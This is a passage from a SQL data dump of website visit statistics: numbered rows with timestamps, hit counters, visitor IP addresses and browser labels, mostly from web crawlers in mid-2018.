182','other'),(263558,1530184302,1,1,0,0,'178.154.171.24','other'),(263559,1530184733,1,1,0,0,'54.36.148.239','other'),(263560,1530184899,1,1,0,0,'216.244.66.241','other'),(263561,1530184998,1,1,0,0,'54.36.149.13','other'),(263562,1530185097,2,2,0,0,'178.92.85.85','chrome'),(263563,1530185438,1,1,0,0,'54.36.148.99','other'),(263564,1530185595,1,1,0,0,'54.36.148.131','other'),(263565,1530185639,1,1,0,0,'54.36.148.161','other'),(263566,1530185653,4,4,0,0,'78.46.149.254','other'),(263567,1530185736,1,1,0,0,'54.36.148.40','other'),(263568,1530185985,1,1,0,0,'37.9.113.182','other'),(263569,1530186340,1,1,0,0,'54.36.149.94','other'),(263570,1530186722,1,1,0,0,'54.36.148.35','other'),(263571,1530186766,2,2,0,0,'54.36.148.69','other'),(263572,1530186863,1,0,1,0,'66.249.66.156',''),(263573,1530186957,1,1,0,0,'54.36.148.217','other'),(263574,1530187107,1,1,0,0,'54.36.148.193','other'),(263575,1530187176,1,1,0,0,'54.36.148.200','other'),(263576,1530187227,1,1,0,0,'54.36.149.107','other'),(263577,1530187756,1,1,0,0,'54.36.148.170','other'),(263578,1530187791,12,12,0,0,'178.92.85.85','chrome'),(263579,1530187929,1,1,0,0,'54.36.148.168','other'),(263580,1530187945,1,1,0,0,'54.36.149.82','other'),(263581,1530188026,1,0,1,0,'66.249.66.156',''),(263582,1530188194,2,2,0,0,'216.244.66.241','other'),(263583,1530188334,1,1,0,0,'8.29.198.25','other'),(263584,1530188711,1,1,0,0,'95.158.36.190','other'),(263585,1530188715,5,5,0,0,'178.92.85.85','chrome'),(263586,1530188761,1,1,0,0,'91.196.178.183','other'),(263587,1530188805,2,2,0,0,'91.196.178.183','chrome'),(263588,1530188814,1,1,0,0,'54.36.148.75','other'),(263589,1530188871,1,1,0,0,'54.36.148.95','other'),(263590,1530188873,1,1,0,0,'66.249.66.151','chrome'),(263591,1530188945,1,1,0,0,'31.13.113.188','other'),(263592,1530188954,1,1,0,0,'31.13.122.22','other'),(263593,1530188956,1,1,0,0,'31.13.122.23','other'),(263594,1530188974,1,1,0,0,'173.252.92.215','other'),(263595,1530189045,1,1,0,0,'54.36.148.255','other'),(263596,1530189124,1,1,0,0,'54.36.148.102','other'),(263597,1530189554,1,1,0,0,'54.36.148.219','other'),(263598,1530189817,1,1,0,0,'54.36.149.51','other'),(263599,1530189847,1,0,1,0,'66.249.66.155',''),(263600,1530189850,1,1,0,0,'54.36.148.209','other'),(263601,1530189872,1,1,0,0,'31.13.111.87','other'),(263602,1530189979,1,1,0,0,'91.196.178.133','chrome'),(263603,1530190014,1,1,0,0,'54.36.148.190','other'),(263604,1530190065,1,1,0,0,'54.36.148.86','other'),(263605,1530190100,1,1,0,0,'54.36.148.176','other'),(263606,1530190159,4,4,0,0,'178.92.85.85','chrome'),(263607,1530190318,1,1,0,0,'54.36.148.228','other'),(263608,1530190471,1,1,0,0,'54.36.148.232','other'),(263609,1530190631,1,1,0,0,'54.36.148.98','other'),(263610,1530190886,1,1,0,0,'141.8.142.74','other'),(263611,1530191103,1,1,0,0,'54.36.148.148','other'),(263612,1530191132,1,1,0,0,'54.36.149.5','other'),(263613,1530191277,1,1,0,0,'54.36.148.72','other'),(263614,1530191324,1,1,0,0,'216.244.66.241','other'),(263615,1530191682,2,2,0,0,'91.196.178.186','chrome'),(263616,1530191935,1,1,0,0,'178.213.2.19','chrome'),(263617,1530192002,1,1,0,0,'91.196.178.43','chrome'),(263618,1530192012,1,1,0,0,'54.36.149.37','other'),(263619,1530192098,1,1,0,0,'54.36.148.115','other'),(263620,1530192156,1,1,0,0,'157.55.39.75','other'),(263621,1530192749,1,1,0,0,'107.167.108.9','other'),(263622,1530192754,2,2,0,0,'54.36.149.74','other'),(263623,1530192795,1,1,0,0,'37.54.16.17','chrome'),(263624,1530193125,1,1,0,0,'54.36.149.77','other'),(263625,1530193322,1,1,0,0,'54.36.148.70','other'),(263626,1530193365,2,2,0,0,'108.59.8.80','other'),(263627,1530193501,1,1,0,0,'54.36.149.91','other'),(263628,1530193660,1,1,0,0,'54.36.149.83','other'),(263629,1530193690,1,1,0,0,'54.36.149.27','other'),(263630,1530193706,1,1,0,0,'54.36.148.243','other'),(263631,1530193908,1,1,0,0,'216.244.66.241','other'),(263632,1530193970,1,1,0,0,'54.36.148.40','other'),(263633,1530194044,1,1,0,0,'141.8.142.74','other'),(263634,1530194323,1,1,0,0,'54.36.148.105','other'),(263635,1530194441,1,1,0,0,'54.36.148.203','other'),(263636,1530194608,1,1,0,0,'8.29.198.26','other'),(263637,1530194729,1,1,0,0,'54.36.148.157','other'),(263638,1530194731,1,1,0,0,'54.36.148.36','other'),(263639,1530194733,1,1,0,0,'54.36.149.71','other'),(263640,1530195327,1,1,0,0,'54.36.148.241','other'),(263641,1530195478,2,2,0,0,'216.244.66.241','other'),(263642,1530195637,1,1,0,0,'54.36.149.24','other'),(263643,1530195857,1,1,0,0,'54.36.149.50','other'),(263644,1530195912,1,1,0,0,'54.36.148.202','other'),(263645,1530196387,1,1,0,0,'54.36.149.78','other'),(263646,1530196479,1,1,0,0,'54.36.148.80','other'),(263647,1530196765,1,1,0,0,'178.154.171.88','other'),(263648,1530196871,1,1,0,0,'216.244.66.241','other'),(263649,1530197072,1,1,0,0,'54.36.148.253','other'),(263650,1530197159,1,1,0,0,'54.36.148.182','other'),(263651,1530197200,1,1,0,0,'54.36.148.242','other'),(263652,1530197379,1,0,1,0,'66.249.66.157',''),(263653,1530197414,1,1,0,0,'54.36.148.77','other'),(263654,1530197445,1,1,0,0,'95.163.255.98','other'),(263655,1530197624,1,1,0,0,'54.36.148.95','other'),(263656,1530197723,1,1,0,0,'54.36.148.30','other'),(263657,1530198134,1,1,0,0,'54.36.149.9','other'),(263658,1530198256,1,1,0,0,'178.154.171.88','other'),(263659,1530198359,1,1,0,0,'54.36.148.87','other'),(263660,1530198363,1,1,0,0,'54.36.148.58','other'),(263661,1530198415,1,1,0,0,'54.36.148.181','other'),(263662,1530198450,1,1,0,0,'54.36.148.209','other'),(263663,1530198475,1,1,0,0,'54.36.148.212','other'),(263664,1530198541,1,1,0,0,'54.36.148.94','other'),(263665,1530198823,1,0,1,0,'66.249.66.74',''),(263666,1530198990,1,1,0,0,'87.250.224.46','other'),(263667,1530198995,2,2,0,0,'54.36.149.98','other'),(263668,1530199009,1,1,0,0,'37.204.189.158','msie'),(263669,1530199131,1,1,0,0,'54.36.148.254','other'),(263670,1530199160,1,1,0,0,'8.29.198.27','other'),(263671,1530199249,1,1,0,0,'54.36.149.0','other'),(263672,1530199780,2,2,0,0,'216.244.66.241','other'),(263673,1530199849,1,1,0,0,'54.36.149.66','other'),(263674,1530199900,1,1,0,0,'141.8.142.74','other'),(263675,1530199916,1,1,0,0,'54.36.148.141','other'),(263676,1530200439,1,1,0,0,'54.36.148.153','other'),(263677,1530200446,1,1,0,0,'54.36.148.214','other'),(263678,1530200755,1,1,0,0,'54.36.148.187','other'),(263679,1530200801,1,1,0,0,'54.36.148.190','other'),(263680,1530200814,3,3,0,0,'5.9.141.8','other'),(263681,1530201135,1,1,0,0,'54.36.148.70','other'),(263682,1530201181,1,1,0,0,'54.36.148.237','other'),(263683,1530201373,4,4,0,0,'216.244.66.241','other'),(263684,1530201504,2,2,0,0,'141.8.142.74','other'),(263685,1530201613,1,1,0,0,'54.36.148.194','other'),(263686,1530201722,1,1,0,0,'178.154.171.88','other'),(263687,1530202202,1,1,0,0,'54.36.149.94','other'),(263688,1530202795,1,1,0,0,'54.36.148.123','other'),(263689,1530202849,1,1,0,0,'54.36.149.71','other'),(263690,1530202916,1,1,0,0,'54.36.149.53','other'),(263691,1530202933,1,1,0,0,'141.8.142.74','other'),(263692,1530203431,1,1,0,0,'178.154.171.88','other'),(263693,1530203661,1,1,0,0,'54.36.148.150','other'),(263694,1530203746,1,1,0,0,'54.36.148.244','other'),(263695,1530203756,1,1,0,0,'54.36.148.50','other'),(263696,1530204221,1,1,0,0,'54.36.149.101','other'),(263697,1530204417,1,1,0,0,'54.36.149.48','other'),(263698,1530204419,1,1,0,0,'54.36.148.45','other'),(263699,1530204535,1,1,0,0,'54.36.149.90','other'),(263700,1530204640,1,1,0,0,'54.36.148.224','other'),(263701,1530204673,1,1,0,0,'178.154.171.88','other'),(263702,1530204842,1,1,0,0,'54.36.148.168','other'),(263703,1530205057,1,1,0,0,'54.36.149.55','other'),(263704,1530205134,1,1,0,0,'54.36.148.239','other'),(263705,1530205331,1,1,0,0,'54.36.149.13','other'),(263706,1530205353,1,1,0,0,'54.36.148.39','other'),(263707,1530205377,1,1,0,0,'54.36.148.178','other'),(263708,1530205413,1,1,0,0,'94.178.109.152','chrome'),(263709,1530205479,1,1,0,0,'8.29.198.25','other'),(263710,1530205581,1,1,0,0,'54.36.149.65','other'),(263711,1530205645,1,1,0,0,'54.36.149.39','other'),(263712,1530205925,1,1,0,0,'95.163.255.107','other'),(263713,1530206052,2,2,0,0,'216.244.66.241','other'),(263714,1530206158,1,1,0,0,'54.36.149.76','other'),(263715,1530206275,2,2,0,0,'95.163.255.117','other'),(263716,1530206409,1,1,0,0,'173.252.89.86','other'),(263717,1530206494,1,1,0,0,'54.36.148.114','other'),(263718,1530206522,1,1,0,0,'54.36.148.18','other'),(263719,1530206538,1,1,0,0,'54.36.148.186','other'),(263720,1530206721,1,1,0,0,'54.36.148.23','other'),(263721,1530206763,1,1,0,0,'46.72.66.202','chrome'),(263722,1530206873,1,1,0,0,'54.36.148.22','other'),(263723,1530206902,2,2,0,0,'178.154.171.88','other'),(263724,1530206977,1,1,0,0,'54.36.148.82','other'),(263725,1530207123,1,1,0,0,'54.36.149.57','other'),(263726,1530207292,1,0,1,0,'66.249.66.155',''),(263727,1530207442,1,1,0,0,'95.163.255.108','other'),(263728,1530207619,1,1,0,0,'54.36.148.38','other'),(263729,1530207723,1,1,0,0,'54.36.148.60','other'),(263730,1530207782,1,1,0,0,'216.244.66.241','other'),(263731,1530207846,1,1,0,0,'54.36.148.162','other'),(263732,1530207888,1,1,0,0,'80.252.155.198','chrome'),(263733,1530207959,4,4,0,0,'46.4.60.249','other'),(263735,1530208206,1,1,0,0,'54.36.149.102','other'),(263736,1530208266,1,1,0,0,'95.163.255.112','other'),(263737,1530208399,1,1,0,0,'54.36.148.238','other'),(263738,1530208645,1,1,0,0,'54.36.148.228','other'),(263739,1530208779,2,2,0,0,'141.8.142.74','other'),(263740,1530208920,1,1,0,0,'54.36.148.29','other'),(263741,1530208999,1,1,0,0,'54.36.148.117','other'),(263742,1530209158,1,1,0,0,'66.249.66.157','chrome'),(263743,1530209165,1,1,0,0,'66.249.66.76','chrome'),(263744,1530209186,1,0,1,0,'66.249.66.75',''),(263745,1530209298,1,1,0,0,'54.36.148.206','other'),(263746,1530209629,1,1,0,0,'95.163.255.107','other'),(263747,1530209791,1,1,0,0,'54.36.148.160','other'),(263748,1530209842,1,1,0,0,'54.36.148.11','other'),(263749,1530209882,1,1,0,0,'54.36.148.49','other'),(263750,1530209925,2,2,0,0,'216.244.66.241','other'),(263751,1530209988,1,1,0,0,'8.29.198.26','other'),(263752,1530210006,1,1,0,0,'66.249.66.156','chrome'),(263753,1530210419,2,2,0,0,'178.92.85.85','chrome'),(263754,1530210477,1,1,0,0,'54.36.149.7','other'),(263755,1530210703,1,1,0,0,'141.8.142.74','other'),(263756,1530210763,1,1,0,0,'54.36.148.158','other'),(263757,1530211705,1,1,0,0,'46.211.154.78','other'),(263758,1530212054,1,1,0,0,'216.244.66.241','other'),(263759,1530212386,1,1,0,0,'54.36.148.253','other'),(263760,1530212950,1,1,0,0,'95.134.171.112','chrome'),(263761,1530213010,1,1,0,0,'54.36.148.62','other'),(263762,1530213012,1,1,0,0,'178.154.171.88','other'),(263763,1530213033,1,1,0,0,'141.8.142.74','other'),(263764,1530213141,1,1,0,0,'54.36.148.50','other'),(263765,1530213238,1,1,0,0,'54.36.149.96','other'),(263766,1530213285,1,1,0,0,'54.36.148.171','other'),(263767,1530213425,1,1,0,0,'66.249.66.155','chrome'),(263768,1530213486,1,1,0,0,'95.163.255.92','other'),(263769,1530213578,1,1,0,0,'54.36.148.253','other'),(263770,1530213585,1,1,0,0,'141.8.132.19','other'),(263771,1530213588,1,1,0,0,'213.180.203.7','other'),(263772,1530213670,1,1,0,0,'54.36.149.95','other'),(263773,1530214003,1,1,0,0,'54.36.148.144','other'),(263774,1530214038,1,1,0,0,'54.36.149.107','other'),(263775,1530214622,1,1,0,0,'37.73.82.109','chrome'),(263776,1530214654,1,1,0,0,'54.36.148.52','other'),(263777,1530214970,1,1,0,0,'54.36.148.249','other'),(263778,1530214986,1,1,0,0,'54.36.148.129','other'),(263779,1530215015,1,1,0,0,'91.196.178.104','chrome'),(263780,1530215105,1,1,0,0,'54.36.149.5','other'),(263781,1530215195,1,1,0,0,'93.72.95.103','chrome'),(263782,1530215423,1,1,0,0,'54.36.148.246','other'),(263783,1530215544,1,1,0,0,'54.36.148.241','other'),(263784,1530215577,2,2,0,0,'178.92.85.85','chrome'),(263785,1530215784,1,1,0,0,'54.36.148.253','other'),(263786,1530215926,1,1,0,0,'178.95.158.98','chrome'),(263787,1530216142,1,1,0,0,'54.36.149.21','other'),(263788,1530216174,1,0,1,0,'66.249.66.157',''),(263789,1530216186,1,1,0,0,'178.154.171.88','other'),(263790,1530216197,1,1,0,0,'54.36.149.39','other'),(263791,1530216201,1,0,1,0,'66.249.66.155',''),(263792,1530216331,1,1,0,0,'8.29.198.26','other'),(263793,1530216578,1,1,0,0,'54.36.148.35','other'),(263794,1530217048,1,1,0,0,'54.36.148.248','other'),(263795,1530217058,1,1,0,0,'54.36.148.18','other'),(263796,1530217244,1,1,0,0,'54.36.149.19','other'),(263797,1530217273,1,1,0,0,'54.36.148.158','other'),(263798,1530217275,1,1,0,0,'54.36.149.91','other'),(263799,1530217516,1,1,0,0,'157.55.39.195','other'),(263800,1530217646,1,1,0,0,'54.36.148.57','other'),(263801,1530217714,1,1,0,0,'54.36.148.242','other'),(263802,1530217975,1,1,0,0,'54.36.148.92','other'),(263803,1530218216,1,1,0,0,'216.244.66.241','other'),(263804,1530218374,1,1,0,0,'54.36.148.89','other'),(263805,1530218376,1,1,0,0,'54.36.148.50','other'),(263806,1530218481,1,1,0,0,'66.102.9.38','chrome'),(263807,1530218605,1,1,0,0,'37.54.23.41','chrome'),(263808,1530218692,1,1,0,0,'54.36.148.29','other'),(263809,1530218707,1,1,0,0,'54.36.148.145','other'),(263810,1530218866,1,1,0,0,'54.36.148.108','other'),(263811,1530218979,1,1,0,0,'54.36.149.9','other'),(263812,1530219262,1,1,0,0,'54.36.148.142','other'),(263813,1530219621,1,1,0,0,'54.36.149.74','other'),(263814,1530219636,1,0,1,0,'66.249.66.156',''),(263815,1530219727,1,0,1,0,'66.249.66.157',''),(263816,1530219855,1,1,0,0,'54.36.149.72','other'),(263817,1530219862,1,0,1,0,'66.249.66.155',''),(263818,1530220591,1,1,0,0,'54.36.149.86','other'),(263819,1530220806,1,1,0,0,'54.36.149.9','other'),(263820,1530220811,1,1,0,0,'8.29.198.26','other'),(263821,1530221062,1,1,0,0,'54.36.148.35','other'),(263822,1530221109,3,3,0,0,'216.244.66.241','other'),(263823,1530221401,1,1,0,0,'54.36.148.217','other'),(263824,1530221516,2,2,0,0,'54.36.148.98','other'),(263825,1530221837,1,1,0,0,'54.36.148.249','other'),(263826,1530221876,4,4,0,0,'5.9.61.101','other'),(263827,1530221981,1,1,0,0,'54.36.149.58','other'),(263828,1530222345,1,1,0,0,'54.36.148.145','other'),(263829,1530222489,1,1,0,0,'54.36.148.218','other'),(263830,1530222600,1,1,0,0,'54.36.148.83','other'),(263831,1530222602,1,1,0,0,'141.8.142.74','other'),(263832,1530222919,2,2,0,0,'216.244.66.241','other'),(263833,1530223078,1,1,0,0,'157.55.39.9','other'),(263834,1530223103,1,1,0,0,'54.36.148.117','other'),(263835,1530223235,1,1,0,0,'54.36.149.52','other'),(263836,1530223616,1,1,0,0,'54.36.148.168','other'),(263837,1530223863,1,1,0,0,'157.55.39.137','other'),(263838,1530223903,1,1,0,0,'54.36.149.73','other'),(263839,1530224172,1,1,0,0,'54.36.149.14','other'),(263840,1530224302,2,2,0,0,'216.244.66.241','other'),(263841,1530224397,1,1,0,0,'54.36.148.179','other'),(263842,1530224559,1,1,0,0,'54.36.148.187','other'),(263843,1530224798,1,1,0,0,'54.36.148.148','other'),(263844,1530225033,1,1,0,0,'54.36.148.36','other'),(263845,1530225149,1,1,0,0,'54.36.148.252','other'),(263846,1530225195,1,1,0,0,'54.36.148.220','other'),(263847,1530226456,2,2,0,0,'207.46.13.172','other'),(263848,1530226601,1,1,0,0,'54.36.148.191','other'),(263849,1530226835,1,1,0,0,'54.36.148.71','other'),(263850,1530227046,1,1,0,0,'54.36.148.59','other'),(263851,1530227129,1,1,0,0,'54.36.149.67','other'),(263852,1530227184,1,1,0,0,'8.29.198.26','other'),(263853,1530227458,1,0,1,0,'66.249.66.156',''),(263854,1530227544,1,1,0,0,'157.55.39.9','other'),(263855,1530227716,1,1,0,0,'95.163.255.113','other'),(263856,1530227731,1,1,0,0,'95.163.255.116','other'),(263857,1530227749,1,1,0,0,'54.36.148.201','other'),(263858,1530227898,1,1,0,0,'54.36.149.62','other'),(263859,1530228042,1,1,0,0,'54.36.149.81','other'),(263860,1530228071,1,1,0,0,'54.36.148.250','other'),(263861,1530228151,1,1,0,0,'54.36.149.103','other'),(263862,1530228243,1,1,0,0,'54.36.148.224','other'),(263863,1530228301,1,1,0,0,'54.36.148.238','other'),(263864,1530228304,1,1,0,0,'54.36.149.20','other'),(263865,1530228954,1,1,0,0,'54.36.149.3','other'),(263866,1530229097,1,1,0,0,'54.36.148.208','other'),(263867,1530229158,3,3,0,0,'216.244.66.241','other'),(263868,1530229164,1,1,0,0,'54.36.149.107','other'),(263869,1530229484,1,0,1,0,'66.249.66.75',''),(263870,1530229503,1,0,1,0,'66.249.66.76',''),(263871,1530229646,1,1,0,0,'54.36.149.68','other'),(263872,1530229809,1,1,0,0,'54.36.148.23','other'),(263873,1530229965,1,1,0,0,'54.36.148.89','other'),(263874,1530229978,1,1,0,0,'54.36.148.79','other'),(263875,1530230133,2,0,2,0,'66.249.66.157',''),(263876,1530230938,1,1,0,0,'54.36.148.93','other'),(263877,1530230964,1,1,0,0,'54.36.149.74','other'),(263878,1530231163,1,1,0,0,'54.36.148.57','other'),(263879,1530231241,2,1,1,0,'66.249.66.76',''),(263880,1530231278,1,1,0,0,'54.36.148.33','other'),(263881,1530231368,1,0,1,0,'66.249.66.156',''),(263882,1530231638,1,1,0,0,'8.29.198.27','other'),(263883,1530231852,1,1,0,0,'54.36.148.134','other'),(263884,1530231855,1,1,0,0,'54.36.148.169','other'),(263885,1530231870,1,1,0,0,'216.244.66.241','other'),(263886,1530232494,1,1,0,0,'54.36.148.153','other'),(263887,1530232561,1,1,0,0,'54.36.149.76','other'),(263888,1530232685,1,1,0,0,'54.36.148.15','other'),(263889,1530232865,1,1,0,0,'54.36.148.85','other'),(263890,1530232960,1,1,0,0,'95.163.255.117','other'),(263891,1530233050,1,1,0,0,'54.36.148.227','other'),(263892,1530233138,1,1,0,0,'54.36.148.46','other'),(263893,1530233320,1,1,0,0,'54.36.148.71','other'),(263894,1530233418,1,1,0,0,'54.36.149.74','other'),(263895,1530233445,1,1,0,0,'54.36.149.14','other'),(263896,1530233573,1,1,0,0,'54.36.148.117','other'),(263897,1530233722,1,1,0,0,'54.36.148.110','other'),(263898,1530233889,1,1,0,0,'54.36.149.10','other'),(263899,1530233920,1,0,1,0,'66.249.66.156',''),(263900,1530233926,1,0,1,0,'66.249.66.155',''),(263901,1530233947,1,1,0,0,'54.36.148.233','other'),(263902,1530234004,1,1,0,0,'54.36.149.32','other'),(263903,1530234108,1,1,0,0,'54.36.149.81','other'),(263904,1530234144,1,1,0,0,'54.36.148.202','other'),(263905,1530234173,1,1,0,0,'54.36.148.23','other'),(263906,1530234175,1,1,0,0,'54.36.148.107','other'),(263907,1530234450,1,1,0,0,'54.36.148.207','other'),(263908,1530234516,1,1,0,0,'173.252.90.171','other'),(263909,1530234581,1,1,0,0,'54.36.148.32','other'),(263910,1530234751,1,1,0,0,'54.36.149.9','other'),(263911,1530234766,1,1,0,0,'207.46.13.172','other'),(263912,1530234927,1,1,0,0,'54.36.149.61','other'),(263913,1530235281,1,1,0,0,'54.36.148.23','other'),(263914,1530235349,1,1,0,0,'54.36.148.182','other'),(263915,1530235353,1,1,0,0,'54.36.149.38','other'),(263916,1530235523,1,1,0,0,'54.36.148.19','other'),(263917,1530235686,1,1,0,0,'216.244.66.241','other'),(263918,1530235872,1,1,0,0,'54.36.148.158','other'),(263919,1530235883,1,1,0,0,'157.55.39.137','other'),(263920,1530235913,1,1,0,0,'54.36.148.142','other'),(263921,1530236062,1,0,1,0,'66.249.66.155',''),(263922,1530236069,1,1,0,0,'54.36.148.87','other'),(263923,1530236557,1,1,0,0,'54.36.148.42','other'),(263924,1530236626,1,1,0,0,'54.36.148.248','other'),(263925,1530236820,1,1,0,0,'54.36.148.106','other'),(263926,1530236884,2,2,0,0,'54.36.148.217','other'),(263927,1530237266,2,2,0,0,'54.36.148.21','other'),(263928,1530237350,1,1,0,0,'144.76.96.236','other'),(263929,1530237470,1,1,0,0,'216.244.66.241','other'),(263930,1530237555,2,2,0,0,'54.36.148.212','other'),(263931,1530237625,1,1,0,0,'54.36.149.33','other'),(263932,1530237823,1,1,0,0,'54.36.149.59','other'),(263933,1530237876,1,1,0,0,'54.36.148.14','other'),(263934,1530237884,1,1,0,0,'54.36.149.30','other'),(263935,1530237893,1,1,0,0,'54.36.148.68','other'),(263936,1530238027,1,1,0,0,'8.29.198.27','other'),(263937,1530238322,1,1,0,0,'54.36.149.91','other'),(263938,1530238446,1,1,0,0,'54.36.148.218','other'),(263939,1530238822,1,1,0,0,'54.36.148.211','other'),(263940,1530239201,1,1,0,0,'54.36.148.33','other'),(263941,1530239230,1,1,0,0,'54.36.149.30','other'),(263942,1530239246,1,1,0,0,'54.36.148.157','other'),(263943,1530239717,1,1,0,0,'54.36.148.14','other'),(263944,1530239745,1,1,0,0,'54.36.149.98','other'),(263945,1530239951,1,1,0,0,'54.36.149.1','other'),(263946,1530240119,1,1,0,0,'54.36.148.89','other'),(263947,1530240153,1,1,0,0,'54.36.148.21','other'),(263948,1530240274,1,1,0,0,'54.36.148.176','other'),(263949,1530240408,2,2,0,0,'54.36.149.66','other'),(263950,1530240480,2,2,0,0,'54.36.148.242','other'),(263951,1530240490,1,1,0,0,'54.36.148.169','other'),(263952,1530240507,1,1,0,0,'54.36.148.216','other'),(263953,1530240900,1,0,1,0,'66.249.66.75',''),(263954,1530241692,1,1,0,0,'54.36.148.68','other'),(263955,1530241964,1,1,0,0,'54.36.149.35','other'),(263956,1530241971,1,1,0,0,'54.36.148.39','other'),(263957,1530241994,1,1,0,0,'54.36.149.83','other'),(263958,1530242087,1,1,0,0,'54.36.149.103','other'),(263959,1530242310,1,1,0,0,'54.36.149.70','other'),(263960,1530242458,1,1,0,0,'54.36.148.15','other'),(263961,1530242471,1,1,0,0,'8.29.198.27','other'),(263962,1530242662,1,1,0,0,'54.36.148.151','other'),(263963,1530242864,1,1,0,0,'54.36.148.209','other'),(263964,1530242891,1,1,0,0,'54.36.148.204','other'),(263965,1530243141,1,1,0,0,'54.36.148.207','other'),(263966,1530243150,1,1,0,0,'54.36.148.203','other'),(263967,1530243382,1,1,0,0,'216.244.66.241','other'),(263968,1530243659,1,1,0,0,'54.36.148.63','other'),(263969,1530243815,1,1,0,0,'54.36.148.53','other'),(263970,1530244052,1,1,0,0,'54.36.149.60','other'),(263971,1530244078,1,1,0,0,'54.36.149.87','other'),(263972,1530244153,2,2,0,0,'178.92.85.85','chrome'),(263973,1530244253,1,1,0,0,'54.36.148.122','other'),(263974,1530244258,1,1,0,0,'54.36.148.218','other'),(263975,1530244425,1,1,0,0,'54.36.148.100','other'),(263976,1530244430,1,1,0,0,'176.14.190.135','msie'),(263977,1530244527,1,1,0,0,'54.36.149.104','other'),(263978,1530244924,1,1,0,0,'54.36.149.27','other'),(263979,1530244935,1,1,0,0,'54.36.148.249','other'),(263980,1530245095,1,1,0,0,'66.249.66.156','chrome'),(263981,1530245108,1,1,0,0,'66.249.66.75','chrome'),(263982,1530246339,1,1,0,0,'54.36.148.67','other'),(263983,1530246535,1,1,0,0,'54.36.149.1','other'),(263984,1530246666,1,1,0,0,'54.36.149.20','other'),(263985,1530246807,1,1,0,0,'54.36.149.63','other'),(263986,1530247273,1,1,0,0,'54.36.148.217','other'),(263987,1530247459,1,1,0,0,'54.36.148.125','other'),(263988,1530247546,1,1,0,0,'54.36.149.15','other'),(263989,1530247661,1,1,0,0,'54.36.148.243','other'),(263990,1530248064,1,1,0,0,'54.36.148.186','other'),(263991,1530248161,1,1,0,0,'54.36.149.8','other'),(263992,1530248867,1,1,0,0,'216.244.66.241','other'),(263993,1530248869,1,1,0,0,'8.29.198.25','other'),(263994,1530249099,1,1,0,0,'54.36.148.147','other'),(263995,1530249125,1,1,0,0,'54.36.148.54','other'),(263996,1530249566,1,1,0,0,'54.36.149.15','other'),(263997,1530250115,1,1,0,0,'157.55.39.137','other'),(263998,1530250222,1,1,0,0,'54.36.148.45','other'),(263999,1530250259,1,1,0,0,'54.36.148.254','other'),(264000,1530250326,1,1,0,0,'54.36.148.15','other'),(264001,1530250346,1,1,0,0,'54.36.148.89','other'),(264002,1530250551,1,1,0,0,'54.36.149.98','other'),(264003,1530250666,1,1,0,0,'54.36.148.238','other'),(264004,1530250669,1,1,0,0,'54.36.148.32','other'),(264005,1530250833,1,0,1,0,'66.249.66.157',''),(264006,1530250866,1,1,0,0,'54.36.149.52','other'),(264007,1530250895,1,1,0,0,'54.36.149.23','other'),(264008,1530251095,1,1,0,0,'54.36.149.94','other'),(264009,1530251202,1,1,0,0,'54.36.149.86','other'),(264010,1530251336,1,1,0,0,'54.36.149.55','other'),(264011,1530251443,1,1,0,0,'54.36.148.177','other'),(264012,1530251507,1,1,0,0,'54.36.148.181','other'),(264013,1530251575,1,1,0,0,'54.36.148.146','other'),(264014,1530251645,1,1,0,0,'216.244.66.241','other'),(264015,1530251865,1,1,0,0,'54.36.149.95','other'),(264016,1530252026,1,1,0,0,'54.36.148.69','other'),(264017,1530252392,1,1,0,0,'54.36.149.31','other'),(264018,1530252596,1,1,0,0,'66.249.66.75','chrome'),(264019,1530252622,1,0,1,0,'66.249.66.76',''),(264020,1530252747,1,1,0,0,'54.36.149.66','other'),(264021,1530253137,1,1,0,0,'54.36.148.254','other'),(264022,1530253152,1,1,0,0,'54.36.148.82','other'),(264023,1530253261,1,1,0,0,'54.36.149.71','other'),(264024,1530253298,1,1,0,0,'8.29.198.27','other'),(264025,1530253590,1,1,0,0,'54.36.148.56','other'),(264026,1530253720,1,1,0,0,'54.36.148.13','other'),(264027,1530253939,1,1,0,0,'54.36.148.34','other'),(264028,1530254016,1,1,0,0,'54.36.148.105','other'),(264029,1530254082,1,1,0,0,'54.36.148.107','other'),(264030,1530254107,1,1,0,0,'54.36.148.251','other'),(264031,1530254138,1,1,0,0,'54.36.148.244','other'),(264032,1530254295,2,0,2,0,'66.249.66.157',''),(264033,1530254369,1,1,0,0,'54.36.148.69','other'),(264034,1530254461,1,1,0,0,'54.36.149.86','other'),(264035,1530254589,1,1,0,0,'54.36.149.64','other'),(264036,1530254752,1,1,0,0,'54.36.148.120','other'),(264037,1530254790,1,1,0,0,'46.211.116.241','chrome'),(264038,1530254798,1,1,0,0,'54.36.148.191','other'),(264039,1530254909,1,1,0,0,'54.36.148.64','other'),(264040,1530255199,1,1,0,0,'66.249.66.157','chrome'),(264041,1530255319,1,1,0,0,'54.36.148.72','other'),(264042,1530255346,1,1,0,0,'207.46.13.172','other'),(264043,1530255357,1,1,0,0,'54.36.148.216','other'),(264044,1530256230,1,1,0,0,'54.36.148.41','other'),(264045,1530256553,1,1,0,0,'54.36.148.168','other'),(264046,1530256580,1,1,0,0,'54.36.148.248','other'),(264047,1530256658,1,1,0,0,'54.36.149.13','other'),(264048,1530257256,1,1,0,0,'54.36.149.35','other'),(264049,1530257326,1,1,0,0,'54.36.148.172','other'),(264050,1530257418,4,4,0,0,'5.9.70.72','other'),(264051,1530257543,1,1,0,0,'157.55.39.137','other'),(264052,1530257576,1,1,0,0,'54.36.149.93','other'),(264053,1530257599,1,1,0,0,'54.36.148.75','other'),(264054,1530257662,1,0,1,0,'66.249.66.155',''),(264055,1530257798,1,1,0,0,'54.36.149.72','other'),(264056,1530258026,1,1,0,0,'176.120.62.253','firefox'),(264057,1530258543,1,1,0,0,'216.244.66.241','other'),(264058,1530258855,1,1,0,0,'54.36.148.247','other'),(264059,1530258982,1,1,0,0,'54.36.149.89','other'),(264060,1530259089,1,1,0,0,'54.36.149.38','other'),(264061,1530259140,1,1,0,0,'54.36.148.32','other'),(264062,1530259225,1,1,0,0,'54.36.148.118','other'),(264063,1530259544,1,1,0,0,'54.36.149.35','other'),(264064,1530259721,1,1,0,0,'8.29.198.27','other'),(264065,1530259919,1,1,0,0,'54.36.148.170','other'),(264066,1530259930,1,1,0,0,'54.36.149.56','other'),(264067,1530259990,1,1,0,0,'216.244.66.241','other'),(264068,1530259991,1,1,0,0,'54.36.148.226','other'),(264069,1530260026,1,1,0,0,'54.36.149.37','other'),(264070,1530260367,1,1,0,0,'54.36.148.18','other'),(264071,1530260451,1,1,0,0,'136.243.74.73','other'),(264072,1530260584,1,1,0,0,'54.36.148.11','other'),(264073,1530260755,1,1,0,0,'54.36.148.147','other'),(264074,1530260783,1,1,0,0